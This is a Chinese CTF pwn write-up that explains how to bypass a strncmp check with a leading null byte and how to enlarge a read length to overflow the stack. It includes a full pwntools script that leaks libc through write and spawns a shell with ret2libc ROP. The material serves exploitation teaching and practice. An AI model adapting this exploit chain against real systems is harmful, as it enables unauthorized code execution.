0x01 解题思路
- 文件基本信息
![在这里插入图片描述](https://img-blog.csdnimg.cn/20190903125131601.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzM4MTAwNTY5,size_16,color_FFFFFF,t_70)
- IDA查看
![在这里插入图片描述](https://img-blog.csdnimg.cn/20190903125222408.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzM4MTAwNTY5,size_16,color_FFFFFF,t_70)
![在这里插入图片描述](https://img-blog.csdnimg.cn/20190903125308752.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzM4MTAwNTY5,size_16,color_FFFFFF,t_70)
读取一个随机数,然后与用户输入作比较,需要绕过。strlen遇到\x00会停止,因此只要开头为\x00,最终比较的长度v1就是0,从而绕过strncmp。
![在这里插入图片描述](https://img-blog.csdnimg.cn/20190903125726377.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzM4MTAwNTY5,size_16,color_FFFFFF,t_70)
这里read的第三个读取长度参数实际上是前一个函数的返回值,可以通过上一次输入覆盖为\xff,然后就可以利用栈溢出进行常规ROP了。
0x02 EXP
from pwn import *
io = process('./pwn',env={"LD_PRELOAD":"./libc-2.23.so"})
elf = ELF('./pwn')
libc = ELF('./libc-2.23.so')
def debug():
global io
addr = raw_input("[+]debug:")
gdb.attach(io, "b *"+addr)
'''
puts_plt_addr = elf.plt['puts']
puts_got_addr = elf.got['puts']
'''
write_plt_addr = elf.plt['write']
write_got_addr = elf.got['write']
main_addr = 0x08048825
bin_sh_offset = 0x15902b
payload = "\x00"
payload += "\xff"*7
io.sendline(payload)
io.recvuntil("Correct\n")
offset = 0xE7
payload = 'A'*(offset+4)
payload += p32(write_plt_addr)
payload += p32(main_addr)
payload += p32(1)
payload += p32(write_got_addr)
payload += p32(4)
io.sendline(payload)
data = io.recv(4)
write_addr = u32(data)
print "[+]write_addr:",hex(write_addr)
libc_base_addr = write_addr - libc.symbols['write']
print "[+]libc_base_addr:",hex(libc_base_addr)
system_addr = libc_base_addr + libc.symbols['system']
print "[+]system_addr:",hex(system_addr)
bin_sh_addr = libc_base_addr + bin_sh_offset
print "[+]bin_sh_addr:",hex(bin_sh_addr)
payload = "\x00"
payload += "\xff"*7
io.sendline(payload)
io.recvuntil("Correct\n")
payload = 'A'*(offset+4)
payload += p32(system_addr)
payload += 'AAAA'
payload += p32(bin_sh_addr)
io.sendline(payload)
io.interactive()